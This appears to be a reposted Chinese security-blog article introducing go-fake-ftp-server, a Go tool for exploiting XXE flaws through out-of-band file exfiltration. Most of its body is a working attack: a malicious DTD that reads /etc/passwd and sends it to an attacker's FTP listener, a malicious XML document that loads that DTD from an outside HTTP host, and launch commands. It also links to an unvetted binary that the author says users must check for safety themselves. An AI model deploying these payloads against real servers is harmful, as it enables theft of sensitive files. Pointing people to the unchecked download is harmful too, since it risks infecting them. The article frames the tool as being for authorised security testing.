文章总结： go-fake-ftp-server是一款使用Go语言编写的XXE漏洞测试工具，通过伪造FTP服务实现外带文件数据读取。工具默认在8008端口运行HTTP服务提供恶意DTD文件，在2121端口运行FTP服务接收外带数据。用户需配置evil.dtd和恶意XML文档，指定目标文件路径和回连地址，上传至存在XXE漏洞的服务器即可通过FTP通道获取敏感文件内容。工具支持自定义端口和DTD文件路径，适合安全测试人员在隔离环境中进行漏洞验证。 综合评分： 72 文章分类： 安全工具,WEB安全,漏洞POC,渗透测试

XXE漏洞测试工具 — go-fake-ftp-server（2月6日更新）

z9nn8w z9nn8w

网络安全者

2026年2月9日 11:42 河南

===================================

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。个人微信：ivu123ivu

0x01 工具介绍

使用Go编写的用于测试XXE漏洞的工具，通过伪造FTP服务外带文件数据。HTTP服务默认运行于 8008 端口，默认用同目录下的evil.dtd作为http响应的恶意dtd文件。FTP服务默认运行于 2121 端口。

./fake-ftp-server -hUsage of ./fake-ftp-server:  -file string        evil dtd file (default "evil.dtd")  -ftpport string        FTP server port (default "2121")  -httpport string        HTTP server port (default "8008")

0x02 安装与使用

编写evil.dtd放于程序同目录下：

<!ENTITY % c SYSTEM&nbsp;"file:///etc/passwd"><!ENTITY % d&nbsp;"<!ENTITY &#37; e SYSTEM 'ftp://ip:FTPport/%c;'>">%d;

恶意xml文档：

<?xml version="1.0"?><!DOCTYPE a [&nbsp; &nbsp;<!ENTITY % b&nbsp;SYSTEM&nbsp;"http://ip:HTTPport/">&nbsp;&nbsp; &nbsp;%b;&nbsp;&nbsp; &nbsp;%e;&nbsp;]><a></a>

执行fake-ftp-server程序，按照默认参数值启动：

./fake-ftp-server

上传恶意xml文档到存在XXE漏洞的服务器进行测试，HTTP服务：

FTP服务，成功获取/etc/passwd完整内容：

也可以指定参数启动：

./fake-ftp-server -file=1.dtd -httpport=8009 -ftpport=2122

修改恶意dtd和xml文档为对应服务端口，同样能实现外带文件的功能：

一定要在虚拟机运行，工具下载链接：

https://pan.quark.cn/s/31a496860b2c

·今 日 推 荐·

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网络安全者 z9nn8w z9nn8w《XXE漏洞测试工具 — go-fake-ftp-server（2月6日更新）》